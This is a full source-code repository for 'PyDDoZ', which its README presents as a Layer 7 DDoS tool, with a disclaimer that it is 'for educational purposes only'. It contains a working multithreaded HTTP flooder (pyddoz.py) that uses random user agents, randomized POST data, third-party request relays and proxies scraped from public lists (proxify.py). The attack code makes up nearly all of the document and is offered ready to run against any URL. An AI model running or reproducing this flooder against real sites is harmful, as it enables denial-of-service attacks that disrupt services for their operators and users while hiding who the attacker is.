├── requirements.txt ├── .travis.yml ├── proxify.py ├── .gitignore ├── README.md ├── pyddoz.py └── LICENSE /requirements.txt: -------------------------------------------------------------------------------- 1 | colorama==0.4.1 2 | requests==2.21.0 3 | urllib3==1.25.2 4 | fake-useragent==0.1.11 5 | -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | # Disable sudo to speed up the build 2 | sudo: false 3 | 4 | # Set the build language to Python 5 | language: python 6 | 7 | # Set the Python version to 3.7 8 | python: 3.7 9 | 10 | # Install the pip dependencies 11 | install: pip install -r requirements.txt 12 | 13 | script: echo "Success!" 14 | -------------------------------------------------------------------------------- /proxify.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import random 4 | 5 | def make_request(): 6 | urls = ['https://free-proxy-list.net/', 'https://www.sslproxies.org/', 'https://www.us-proxy.org/'] 7 | headers = { 8 | 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11', 9 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 10 | 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3', 11 | 'Accept-Encoding': 'none', 12 | 'Accept-Language': 'en-US,en;q=0.8', 13 | 'Connection': 'keep-alive', 14 | 'Content-Encoding': 'gzip', 15 | 'Content-Type': 'text/html; charset=utf-8' 16 | } 17 | response = requests.get(random.choice(urls), headers=headers).text 18 | return re.findall(r"[^<]*[^<]*[^<]*[^<]*[^<]*[^<]*[^<]*[^<]*", response) 19 | 20 | def one(): 21 | match = random.choice(make_request()) 22 | result = match.split('') 23 | ip_address = result[0].strip('') 24 | port = result[1].strip('') 25 | if result[6].strip('') == 'ye': 26 | typ = 'https' 27 | else: 28 | typ = 'http' 29 | return typ + '://' + ip_address + ':' + port 30 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [![Made with Python](http://ForTheBadge.com/images/badges/made-with-python.svg)](https://www.python.org/) [![Winter is coming!](http://ForTheBadge.com/images/badges/winter-is-coming.svg)](https://github.com/n1rv4n4/pyddoz/) 2 | 3 | # PyDDoZ [![PyDDoZ](https://img.shields.io/badge/PyDDoZ-1.0.3-red.svg)](https://github.com/n1rv4n4/pyddoz/) [![Build Status](https://travis-ci.org/0x01h/pyddoz.svg?branch=master)](https://travis-ci.org/0x01h/pyddoz) [![GPLv3](https://img.shields.io/badge/License-GPLv3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0.en.html) 4 | PyDDoZ is a powerful, human-friendly DDoS tool using application layer (L7) attack techniques. It has nice logging, proxifying, automated bots requests, randomizing data, multiple HTTP request methods, and many other features! Apply load/stress tests to your web application in various ways easily. Written in Python. 5 | 6 | ## Prerequisites 7 | `$ pip3 install -r requirements.txt` 8 | 9 | ## Installation 10 | ``` 11 | $ git clone https://github.com/0x01h/pyddoz.git 12 | $ cd pyddoz 13 | $ python3 pyddoz.py 14 | ``` 15 | 16 | ## Usage 17 | PyDDoZ provides an interactive shell for users. 18 | 19 | - URLs have to given with http:// or https://. **Do not give only domain name!** 20 | - You can enter multiple URLs with a blank space. It will request randomly one of them for every request.
21 | Example: https://google.com https://twitter.com https://yahoo.com 22 | 23 | Or give just one URL. 24 | 25 | - Select one of the request method. POST and PUT require data to post!
26 | After selecting POST or PUT, you can randomize the data for every request!
27 | 28 | For instance, `username=admin&query=hello` will be sent as `username=[RANDOMSTR]&query=[RANDOMSTR]`
29 | 30 | **RANDOMSTR** could be any random string that was generated at backstage. You can determine maximum length of the random generated string. 31 | 32 | ### Argument Parsing 33 | If you like to use in argument mode rather than interactive mode, take a look at the parameters. 34 | 35 | `$ python3 pyddoz.py -h` 36 | 37 | ``` 38 | usage: pyddoz.py [-h] -u U [-m {g,p,u,h,o,d}] [-d D] [-r {y,n}] [-mr MR] 39 | [-b {y,n}] [-ob {y,n}] [-t T] [-th TH] [-s S] [-re RE] 40 | [-p {y,n}] [-rd {y,n}] 41 | 42 | PyDDoZ Argument Parser v1.0.0 43 | 44 | optional arguments: 45 | -h, --help show this help message and exit 46 | -u U URL 47 | -m {g,p,u,h,o,d} GET, POST, PUT, HEAD, OPTIONS, DELETE? [G/P/U/H/O/D] 48 | -d D Post or Put Data 49 | -r {y,n} Randomize Data 50 | -mr MR Max Random Character 51 | -b {y,n} Activate Bots 52 | -ob {y,n} Only Bots 53 | -t T Timeout 54 | -th TH Threads 55 | -s S Sleep Time Between Threads 56 | -re RE Retries 57 | -p {y,n} Proxy 58 | -rd {y,n} Redirection 59 | ``` 60 | 61 | ### Features 62 | - Activation of bots: In addition to standard requests, they will also hit and crawl the target URL. (**This feature is experimental and not powerful for now, feel free to send PR to improve and add new bots.**) 63 | - Timeout: Maximum waiting time request to be responded. (Recommended value is higher than 5.) 64 | - Threads: Number of threads to involve the attack. (Large number of threads could lead connection and system errors!) 65 | - Sleeping time between threads (seconds): 0 to non-wait, or you can give floating number such as 0.25, 0.5, or 0.87 etc. 66 | - Retries after failure: You can force requests to retry again. 67 | - Proxy: After selecting this option, fresh and live proxies will be fetched and used randomly! No need to enter proxies manually. 68 | - Allowing redirections: If target responds with 302 or 301 code, you may allow redirections, but most of the time not required. 69 | 70 | [![Say thanks.](https://img.shields.io/badge/say-thanks-ff69b4.svg)](https://www.linkedin.com/in/orçunözdemir/) 71 | 72 | **For educational purposes only.** 73 | 74 | 75 | -------------------------------------------------------------------------------- /pyddoz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | import logging 5 | import json 6 | import proxify 7 | import requests 8 | import random 9 | import resource 10 | import sys 11 | import string 12 | import time 13 | import threading 14 | import urllib3 15 | from colorama import Fore, Back 16 | from logging.handlers import RotatingFileHandler 17 | from fake_useragent import UserAgent 18 | from time import sleep 19 | 20 | 21 | def show_banner(): 22 | print(Fore.RED + Back.BLACK + r''' 23 | -__ /\\ -_____ -_____ _-___ 24 | || \\ ' | -, ' | -, / 25 | /||__|| '\\/\\ /| | |` /| | |` /'\\ / 26 | \||__|| || ;' || |==|| || |==|| || || =/= 27 | || |, ||/ ~|| | |, ~|| | |, || || / 28 | _-||-_/ |/ ~-____, ~-____, \\,/ /-__- 29 | || ( ( ( 30 | -_- 31 | ''') 32 | 33 | 34 | def send_request(): 35 | try: 36 | global num_success 37 | global num_failed 38 | global payload 39 | 40 | url = random.choice(urls) 41 | 42 | header = { 43 | 'User-Agent': ua.random, 44 | 'Accept': '*/*', 45 | 'Accept-Language': 'en-US,en;q=0.5', 46 | 'Accept-Encoding': 'gzip, deflate, br', 47 | 'Pragma': 'no-cache', 48 | 'Cache-Control': 'no-cache', 49 | 'Referer': url} 50 | 51 | request = requests.Session() 52 | request.verify = False 53 | 54 | proxy = None 55 | 56 | if (use_proxy == 'y'): 57 | proxy = proxify.one() 58 | proxy_protocol = proxy.split(':')[0] 59 | proxy = {proxy_protocol: proxy} 60 | logging.info('Selected proxy: ' + str(proxy)) 61 | 62 | if (activate_bots == 'y'): 63 | bot_header = header 64 | bot_header['Content-Type'] = 'application/x-www-form-urlencoded' 65 | payload = 'url=' + url + '&submit=Submit&type=GET&http=1.1&uak=0' 66 | 67 | try: 68 | response = request.post( 69 | bot_url, 70 | timeout=selected_to, 71 | headers=bot_header, 72 | data=payload, 73 | proxies=proxy, 74 | allow_redirects=True) 75 | logging.info('Response code from bot: ' + 76 | str(response.status_code)) 77 | global num_bot_requests 78 | num_success += 1 if response.status_code == 200 else 0 79 | num_bot_requests += 1 80 | 81 | except Exception as exception: 82 | num_failed += 1 83 | logging.error('Bot request was failed! - ' + str(exception)) 84 | 85 | if (only_bots == 'y'): 86 | return 87 | 88 | if (randomize_data == 'y'): 89 | try: 90 | for data in payload: 91 | payload.update({data: ''.join(random.sample( 92 | (string.ascii_letters + string.digits), random.randint(5, max_random)))}) 93 | except: 94 | payload = ''.join(random.sample((string.ascii_letters + string.digits), random.randint(5, max_random))) 95 | logging.info('Randomized data: ' + str(payload)) 96 | 97 | adapter = requests.adapters.HTTPAdapter(max_retries=num_retries) 98 | request.mount('http://', adapter) 99 | request.mount('https://', adapter) 100 | 101 | if (selected_method == 'p'): 102 | response = request.post( 103 | url, 104 | timeout=selected_to, 105 | headers=header, 106 | proxies=proxy, 107 | data=payload, 108 | allow_redirects=selected_redir) 109 | elif (selected_method == 'u'): 110 | response = request.put( 111 | url, 112 | timeout=selected_to, 113 | headers=header, 114 | proxies=proxy, 115 | data=payload, 116 | allow_redirects=selected_redir) 117 | elif (selected_method == 'g'): 118 | response = request.get( 119 | url, 120 | timeout=selected_to, 121 | headers=header, 122 | proxies=proxy, 123 | allow_redirects=selected_redir) 124 | elif (selected_method == 'o'): 125 | response = request.options( 126 | url, 127 | timeout=selected_to, 128 | headers=header, 129 | proxies=proxy, 130 | allow_redirects=selected_redir) 131 | elif (selected_method == 'h'): 132 | response = request.head( 133 | url, 134 | timeout=selected_to, 135 | headers=header, 136 | proxies=proxy, 137 | allow_redirects=selected_redir) 138 | elif (selected_method == 'd'): 139 | response = request.delete( 140 | url, 141 | timeout=selected_to, 142 | headers=header, 143 | proxies=proxy, 144 | allow_redirects=selected_redir) 145 | else: 146 | raise ValueError('Invalid method!') 147 | logging.error('Invalid method!') 148 | 149 | logging.info('Response code: ' + str(response.status_code)) 150 | num_success += 1 151 | 152 | except Exception as exception: 153 | num_failed += 1 154 | logging.error('Request was failed! - ' + str(exception)) 155 | 156 | return 157 | 158 | 159 | def arg_parsing(): 160 | 161 | parser = argparse.ArgumentParser( 162 | description='PyDDoZ Argument Parser v1.0.0') 163 | parser.add_argument('-u', help='URL', required=True, type=str) 164 | parser.add_argument( 165 | '-m', 166 | help='GET, POST, PUT, HEAD, OPTIONS, DELETE? [G/P/U/H/O/D]', 167 | default='g', 168 | choices=[ 169 | 'g', 170 | 'p', 171 | 'u', 172 | 'h', 173 | 'o', 174 | 'd']) 175 | parser.add_argument('-d', help='Post or Put Data', default='', type=str) 176 | parser.add_argument( 177 | '-r', 178 | help='Randomize Data', 179 | default='n', 180 | choices=[ 181 | 'y', 182 | 'n']) 183 | parser.add_argument( 184 | '-mr', 185 | help='Max Random Character', 186 | default='10', 187 | type=int) 188 | parser.add_argument( 189 | '-b', 190 | help='Activate Bots', 191 | default='n', 192 | choices=[ 193 | 'y', 194 | 'n']) 195 | parser.add_argument( 196 | '-ob', 197 | help='Only Bots', 198 | default='n', 199 | choices=[ 200 | 'y', 201 | 'n']) 202 | parser.add_argument('-t', help='Timeout', default=30, type=int) 203 | parser.add_argument('-th', help='Threads', default=128, type=int) 204 | parser.add_argument( 205 | '-s', 206 | help='Sleep Time Between Threads', 207 | default=0, 208 | type=int) 209 | parser.add_argument('-re', help='Retries', default=3, type=int) 210 | parser.add_argument('-p', help='Proxy', default='n', choices=['y', 'n']) 211 | parser.add_argument( 212 | '-rd', 213 | help='Redirection', 214 | default='n', 215 | choices=[ 216 | 'y', 217 | 'n']) 218 | args = parser.parse_args() 219 | 220 | return args 221 | 222 | 223 | if __name__ == '__main__': 224 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 225 | logging.basicConfig( 226 | filename='pyddoz.log', 227 | format='%(asctime)s | %(levelname)s | %(message)s', 228 | datefmt='%m/%d/%Y %I:%M:%S %p', 229 | filemode='w', 230 | level=logging.DEBUG) 231 | log = logging.getLogger() 232 | handler = RotatingFileHandler( 233 | 'pyddoz.log', 234 | maxBytes=10 * 1024 * 1024, 235 | backupCount=3) 236 | log.addHandler(handler) 237 | show_banner() 238 | logging.info('Program started!') 239 | print(Back.RESET + Fore.BLUE + '\nProgram is preparing...', end='') 240 | print('\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b', end='') 241 | 242 | try: 243 | ua = UserAgent() 244 | 245 | except BaseException: 246 | ua = UserAgent(use_cache_server=False) 247 | 248 | num_failed = 0 249 | num_success = 0 250 | num_bot_requests = 0 251 | bot_url = 'https://websniffer.cc/' 252 | urls = [] 253 | randomize_data = 'n' 254 | interactive_mode = False 255 | 256 | try: 257 | if (not (len(sys.argv) > 1)): 258 | interactive_mode = True 259 | raise Exception('Interactive Shell Mode') 260 | else: 261 | arguments = arg_parsing() 262 | 263 | if ((arguments is not False) and (arguments.u)): 264 | 265 | urls = [arguments.u] 266 | selected_method = arguments.m 267 | payload = arguments.d 268 | randomize_data = arguments.r 269 | max_random = arguments.mr 270 | activate_bots = arguments.b 271 | only_bots = arguments.ob 272 | selected_to = arguments.t 273 | num_threads = arguments.th 274 | sleep_time = arguments.s 275 | num_retries = arguments.re 276 | use_proxy = arguments.p 277 | selected_redir = arguments.rd 278 | 279 | start_time = time.time() 280 | print(Fore.BLUE + '\rProgram was started successfully!') 281 | print(Fore.RED + 'Attack is started! Press [CTRL + C] to stop.') 282 | logging.info('Attack started!') 283 | 284 | while (True): 285 | try: 286 | for i in range(num_threads): 287 | t = threading.Thread(target=send_request) 288 | t.start() 289 | sleep(sleep_time) 290 | elapsed_time = time.time() - start_time 291 | print(Fore.BLUE + 'Responded Requests: {0} - Nuked Requests: {1} - Bot Requests: {2} - Elapsed Time: {3} seconds.'.format(str(num_success), str(num_failed), str(num_bot_requests), round(elapsed_time)), end='\r', flush=True) 292 | 293 | main_thread = threading.currentThread() 294 | for i in threading.enumerate(): 295 | if i is main_thread: 296 | continue 297 | else: 298 | print(Fore.BLUE + 'Responded Requests: {0} - Nuked Requests: {1} - Bot Requests: {2} - Elapsed Time: {3} seconds.'.format(str(num_success), str(num_failed), str(num_bot_requests), round(elapsed_time)), end='\r', flush=True) 299 | i.join() 300 | 301 | except KeyboardInterrupt: 302 | print(Fore.RED + '\nAttack was stopped!') 303 | logging.info('Attack stopped!') 304 | main_thread = threading.currentThread() 305 | print(Fore.RED + 'Threads are exiting...') 306 | 307 | for i in threading.enumerate(): 308 | if i is main_thread: 309 | continue 310 | else: 311 | i.join() 312 | 313 | logging.info( 314 | 'Responded Requests: {0} - Nuked Requests: {1} - Bot Requests: {2} - Elapsed Time: {3} seconds.'.format( 315 | str(num_success), 316 | str(num_failed), 317 | str(num_bot_requests), 318 | round(elapsed_time))) 319 | print(Fore.BLUE + 'Successfully finished!') 320 | logging.info('Successfully finished!') 321 | sys.exit() 322 | 323 | except BaseException as arg_error: 324 | logging.critical('Argument mode was stopped! ' + str(arg_error)) 325 | if (not interactive_mode): 326 | sys.exit() 327 | 328 | print(Fore.BLUE + '\rProgram was started successfully!') 329 | 330 | while (True): 331 | try: 332 | selected_urls = str(input(Fore.GREEN + 'Enter URL(s): ')) 333 | 334 | if (not isinstance(selected_urls, str)): 335 | print(Fore.RED + 'Enter valid URL(s)!') 336 | continue 337 | 338 | else: 339 | break 340 | 341 | except KeyboardInterrupt: 342 | logging.critical('Interrupt by keyboard before the attack!') 343 | sys.exit() 344 | 345 | except BaseException: 346 | continue 347 | 348 | for splitted_url in selected_urls.split(' '): 349 | urls.append(splitted_url) 350 | logging.info('URL: ' + splitted_url) 351 | 352 | while (True): 353 | try: 354 | selected_method = str( 355 | input( 356 | Fore.GREEN + 357 | 'Enter request method GET, POST, PUT, HEAD, OPTIONS, DELETE? [G/P/U/H/O/D]: ')[0].lower()) 358 | 359 | if (selected_method not in 'gpuhod'): 360 | print(Fore.RED + 'Enter G, P, U, H, O, or D!') 361 | continue 362 | 363 | else: 364 | break 365 | 366 | except KeyboardInterrupt: 367 | logging.critical('Interrupt by keyboard before the attack!') 368 | sys.exit() 369 | 370 | except BaseException: 371 | continue 372 | 373 | logging.info('HTTP request method: ' + selected_method.upper()) 374 | 375 | if (selected_method == 'p' or selected_method == 'u'): 376 | payload = {} 377 | key_turn = True 378 | raw_post = str(input(Fore.GREEN + 'Enter post data: ')) 379 | 380 | try: 381 | if ('&' in raw_post): 382 | for params in raw_post.split('&'): 383 | for param in params.split('='): 384 | if key_turn: 385 | payload[param] = '' 386 | last_key = param 387 | key_turn = False 388 | else: 389 | payload[last_key] = param 390 | key_turn = True 391 | else: 392 | payload[raw_post.split('=')[0]] = raw_post.split('=')[1] 393 | 394 | logging.info('POST or PUT data: ' + str(payload)) 395 | 396 | except BaseException as payload_error: 397 | payload = 'LEL!' 398 | logging.error(payload_error) 399 | logging.error( 400 | 'POST or PUT data could not be understood! Default data configurated as: "' + 401 | payload + 402 | '"') 403 | 404 | while (True): 405 | try: 406 | randomize_data = str( 407 | input( 408 | Fore.GREEN + 409 | 'Do you want to randomize post data? [Y/N]: ')[0].lower()) 410 | 411 | if (randomize_data not in 'yn'): 412 | print(Fore.RED + 'Enter Y or N!') 413 | continue 414 | 415 | else: 416 | break 417 | 418 | except KeyboardInterrupt: 419 | logging.critical('Interrupt by keyboard before the attack!') 420 | sys.exit() 421 | 422 | except BaseException: 423 | continue 424 | 425 | logging.info('Randomize data: ' + randomize_data.upper()) 426 | 427 | if (randomize_data == 'y'): 428 | while (True): 429 | try: 430 | max_random = int( 431 | input( 432 | Fore.GREEN + 433 | 'Enter maximum length of random alphanumeric strings to create: ')) 434 | 435 | if (not isinstance(max_random, int) 436 | or not (5 <= max_random <= 1048576)): 437 | print( 438 | Fore.RED + 'Enter valid number between 5 and 1048576!') 439 | continue 440 | 441 | else: 442 | break 443 | 444 | except KeyboardInterrupt: 445 | logging.critical( 446 | 'Interrupt by keyboard before the attack!') 447 | sys.exit() 448 | 449 | except BaseException: 450 | continue 451 | 452 | logging.info( 453 | 'Maximum length of randomized string: ' + 454 | str(max_random)) 455 | 456 | while (True): 457 | try: 458 | activate_bots = str( 459 | input( 460 | Fore.GREEN + 461 | 'Do you want to activate bots? [Y/N]: ')[0].lower()) 462 | 463 | if (activate_bots not in 'yn'): 464 | print(Fore.RED + 'Enter Y or N!') 465 | continue 466 | 467 | else: 468 | break 469 | 470 | except KeyboardInterrupt: 471 | logging.critical('Interrupt by keyboard before the attack!') 472 | sys.exit() 473 | 474 | except BaseException: 475 | continue 476 | 477 | logging.info('Activate Bots: ' + activate_bots.upper()) 478 | 479 | if (activate_bots == 'y'): 480 | while (True): 481 | try: 482 | only_bots = str( 483 | input( 484 | Fore.RED + 485 | 'Only bots? [Y/N]: ')[0].lower()) 486 | 487 | if (only_bots not in 'yn'): 488 | print(Fore.RED + 'Enter Y or N!') 489 | continue 490 | 491 | else: 492 | break 493 | 494 | except KeyboardInterrupt: 495 | logging.critical('Interrupt by keyboard before the attack!') 496 | sys.exit() 497 | 498 | except BaseException: 499 | continue 500 | 501 | if (only_bots == 'y'): 502 | logging.warning('Only bots are included!') 503 | else: 504 | pass 505 | 506 | while (True): 507 | try: 508 | selected_to = float( 509 | input( 510 | Fore.GREEN + 511 | 'Enter timeout second for requests: ')) 512 | 513 | if (not isinstance(selected_to, float) 514 | or not (3 <= selected_to <= 30)): 515 | print(Fore.RED + 'Enter valid second(s) between 3 and 30!') 516 | continue 517 | 518 | else: 519 | break 520 | 521 | except KeyboardInterrupt: 522 | logging.critical('Interrupt by keyboard before the attack!') 523 | sys.exit() 524 | 525 | except BaseException: 526 | continue 527 | 528 | logging.info('Timeout: ' + str(selected_to)) 529 | 530 | while (True): 531 | try: 532 | num_threads = int(input(Fore.GREEN + 'Enter number of threads: ')) 533 | 534 | if (not isinstance(num_threads, int) 535 | or not (1 <= num_threads <= 1024)): 536 | print( 537 | Fore.RED + 538 | 'Enter valid number of threads between 1 and 1024!') 539 | continue 540 | 541 | else: 542 | break 543 | 544 | except KeyboardInterrupt: 545 | logging.critical('Interrupt by keyboard before the attack!') 546 | sys.exit() 547 | 548 | except BaseException: 549 | continue 550 | 551 | logging.info('Number of threads: ' + str(num_threads)) 552 | 553 | while (True): 554 | try: 555 | sleep_time = float( 556 | input( 557 | Fore.GREEN + 558 | 'Enter seconds of sleeping between threads: ')) 559 | 560 | if (not isinstance(sleep_time, float) 561 | or not (0 <= sleep_time <= 300)): 562 | print(Fore.RED + 'Enter valid seconds between 0 and 300!') 563 | continue 564 | 565 | else: 566 | break 567 | 568 | except KeyboardInterrupt: 569 | logging.critical('Interrupt by keyboard before the attack!') 570 | sys.exit() 571 | 572 | except BaseException: 573 | continue 574 | 575 | logging.info( 576 | 'Sleep time between threads: ' + 577 | str(sleep_time) + 578 | ' seconds.') 579 | 580 | while (True): 581 | try: 582 | num_retries = int( 583 | input( 584 | Fore.GREEN + 585 | 'Enter number of retries after a connection failure: ')) 586 | 587 | if (not isinstance(num_retries, int) 588 | or not (0 <= num_retries <= 32)): 589 | print( 590 | Fore.RED + 591 | 'Enter valid number of retries between 0 and 32!') 592 | continue 593 | 594 | else: 595 | break 596 | 597 | except KeyboardInterrupt: 598 | logging.critical('Interrupt by keyboard before the attack!') 599 | sys.exit() 600 | 601 | except BaseException: 602 | continue 603 | 604 | logging.info('Number of retries after failures: ' + str(num_retries)) 605 | 606 | while (True): 607 | try: 608 | use_proxy = str( 609 | input( 610 | Fore.GREEN + 611 | 'Do you want to use proxy? [Y/N]: ')[0].lower()) 612 | 613 | if (use_proxy not in 'yn'): 614 | print(Fore.RED + 'Enter Y or N!') 615 | continue 616 | 617 | else: 618 | break 619 | 620 | except KeyboardInterrupt: 621 | logging.critical('Interrupt by keyboard before the attack!') 622 | sys.exit() 623 | 624 | except BaseException: 625 | continue 626 | 627 | logging.info('Use Proxy?: ' + use_proxy.upper()) 628 | 629 | while (True): 630 | try: 631 | selected_redir = str( 632 | input( 633 | Fore.GREEN + 634 | 'Do you want to allow redirections? [Y/N]: ')[0].lower()) 635 | 636 | if (selected_redir not in 'yn'): 637 | print(Fore.RED + 'Enter Y or N!') 638 | continue 639 | 640 | else: 641 | break 642 | 643 | except KeyboardInterrupt: 644 | logging.critical('Interrupt by keyboard before the attack!') 645 | sys.exit() 646 | 647 | except BaseException: 648 | continue 649 | 650 | logging.info('Allow Redirections?: ' + str(selected_redir)) 651 | 652 | if (selected_redir == 'y'): 653 | selected_redir = True 654 | else: 655 | selected_redir = False 656 | 657 | start_time = time.time() 658 | print(Fore.RED + 'Attack is started! Press [CTRL + C] to stop.') 659 | logging.info('Attack started!') 660 | 661 | while (True): 662 | try: 663 | for i in range(num_threads): 664 | t = threading.Thread(target=send_request) 665 | t.start() 666 | sleep(sleep_time) 667 | elapsed_time = time.time() - start_time 668 | print(Fore.BLUE + 'Responded Requests: {0} - Nuked Requests: {1} - Bot Requests: {2} - Elapsed Time: {3} seconds.'.format(str(num_success), str(num_failed), str(num_bot_requests), round(elapsed_time)), end='\r', flush=True) 669 | 670 | main_thread = threading.currentThread() 671 | for i in threading.enumerate(): 672 | if i is main_thread: 673 | continue 674 | else: 675 | print(Fore.BLUE + 'Responded Requests: {0} - Nuked Requests: {1} - Bot Requests: {2} - Elapsed Time: {3} seconds.'.format(str(num_success), str(num_failed), str(num_bot_requests), round(elapsed_time)), end='\r', flush=True) 676 | i.join() 677 | 678 | except KeyboardInterrupt: 679 | print(Fore.RED + '\nAttack was stopped!') 680 | logging.info('Attack stopped!') 681 | main_thread = threading.currentThread() 682 | print(Fore.RED + 'Threads are exiting...') 683 | 684 | for i in threading.enumerate(): 685 | if i is main_thread: 686 | continue 687 | else: 688 | i.join() 689 | 690 | logging.info( 691 | 'Responded Requests: {0} - Nuked Requests: {1} - Bot Requests: {2} - Elapsed Time: {3} seconds.'.format( 692 | str(num_success), 693 | str(num_failed), 694 | str(num_bot_requests), 695 | round(elapsed_time))) 696 | print(Fore.BLUE + 'Successfully finished!') 697 | logging.info('Successfully finished!') 698 | break 699 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. 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